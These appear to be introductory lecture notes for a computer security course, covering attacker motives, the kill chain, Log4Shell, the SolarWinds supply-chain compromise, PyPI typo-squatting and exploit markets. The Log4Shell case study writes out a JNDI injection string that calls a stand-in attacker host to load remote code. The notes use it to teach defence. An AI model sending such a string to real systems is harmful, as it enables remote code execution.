Intro

Computer and Network Security: Overview #

The computer security problem #

  • Lots of buggy software
  • Money can be made from finding and exploiting vulns
    • Marketplace for exploits (gaining a foothold)
    • Marketplace for malware (post-compromise)
    • Strong economic and political motivation for using both
  • Current state:
    • Existence of vulns is somewhat evenly distributed across OS’s
    • Usage of exploits: almost 50% start by attacking Microsoft Office; 32% start by attacking the browser

Course goals #

  • Understand exploit techniques
    • Learn to defend and prevent common exploits
  • Understand available security tools
  • Learn to architect secure systems

This course #

  • Part 1: basics (architecting for security)
    • Securing apps, OS, and legacy code: sandboxing, access control, and security testing
  • Part 2: Web security (defending against a web attacker)
    • Building robust websites, understanding the browser security model
  • Part 3: network security (defending against a network attacker)
    • Monitoring and architecting secure networks
  • Part 4: securing mobile applications

Course introduction: what motivates attackers? #

Why compromise machines? Examples #

  1. Steal user credentials
    • Keylog for banking passwords, corporate passwords, gaming passwords
    • e.g. SilentBanker: Adversary-in-the-Browser (AITB) attack; finSpy on mobile devices
  2. Ransomware
    • Encrypts files on disk, requests payment (typically in cryptocurrency) to unlock
    • e.g. WannaCry (2017), weaponizing the EternalBlue Windows SMB exploit
  3. Cryptocurrency mining
    • Malware trojans deploy cryptocurrency miners on end-user host systems to create powerful botnets; generates profit for hackers

Why server-side attacks? #

  1. Data theft
    • Can steal credit card numbers, intellectual property, etc
    • e.g. Equifax (2017): ~143M “customer” data impacted"
      • Exploited known remote code execution (RCE) vulnerability in Apache Struts
    • Many such attacks since 2000
  2. Political motivation
    • e.g. attack on DNC (2015)
    • e.g. Ukraine attacks: 2014 election, 2015-2016 power grid, 2017 NotPetya, …
  3. Infect visiting users: see above

Typical attack steps (Cyber Kill Chain) #

  1. Reconnnaissance
  2. Foothold: initial breach
  3. Internal reconnaissance
  4. Lateral movement
  5. Data extraction
  6. Exfiltration

Case study: Log4Shell (2021) #

  • Log4j: popular logging framework for Java
    • Nov. 2021: vulnerability in Log4j v2 enables RCE
    • Over 7000 code repositories affected
  • Bug:
    • Log4j can load and run code to process a log request
    • Attacker sends a message containing ${jndi:ldap://attacker.com} to the victim
    • Victim runs log.info("...${jndi:ldap://attacker.com}...")
    • Victim will then HTTP GET the code at ldap://attacker.com and run it: allowing malicious Java code
  • Exploitation:
    • Khonsari ransomware
    • XMRIG cryptominer
    • Orcus remote access trojan
  • Preventing problems of this type:
    • Isolation: sandbox Log4j library or sandbox entire application

Case study: SolarWinds Orion (2020) #

  • SolarWinds Orion: set of monitoring tools used by many organizations
  • Attack (Feb. 20, 2020):
    • Attacker corrupts SolarWinds software update process using sunburst malware
    • Infected DLL distributed to customers, allowing remote access to customer sites
  • Large number of infected organizations, not detected until Dec. 2020
  • How did attacker corrupt the SolarWinds build process?
    • taskhostsvc.exe runs on SolarWinds build system:
      • Monitors for processes running MsBuild.exe (Visual Studio)
      • If found, read cmd line args to test if Orion software being built
      • If so:
        • Replace file InventoryManager.cs with malware version, backup original to InventoryManager.bk
        • When MsBuild.exe exits, restore original file, no trace left
  • Fallout:
    • Large number of orgs and government systems exposed for many months
    • More generally: supply chain attack - hardware, software or service supplier is compromised -> many compromised customers
      • Many examples of this in the past (e.g., Target 2013 hack)

Case study: typo squatting #

  • pip: Package installer from python
    • Usage: pip install 'SomePackage >= 2.3'
    • By default: installs from PyPi (Python Package Index at pypi.org)
      • PyPi hosts over 300,000 projects
  • Security considerations: dependencies
    • Package maintainer can inject code into your environment
    • Supply chain attack: attack on package manager -> compromise dependent projects
  • Security considerations: typo-squatting
    • The risk: malware packages with a similar name to a popular package; unsuspecting developers install the wrong package
    • e.g. urllib3 is a package to parse urls, urlib3 is a malware package
    • e.g. python-nmap is a net scanning package, nmap-python is a malware package
    • From 2017-2020, over 40 such incidents discovered on PyPi

Course introduction: The Marketplace for Vulnerabilities #

Bug bounty programs #

  • Google: Up to $31,337
  • Microsoft: Up to $100k
  • Apple: Up to $200K
  • Stanford: up to $1k
  • Pwn2Own: $15k

Exploit brokers #

  • Zerodium: up to $2M for iOS, $2.5M for Android (2019); clients are government organizations
  • These groups are primarily interested in RCE, local privilege escalation (LPE), and sandbox escape (SBX)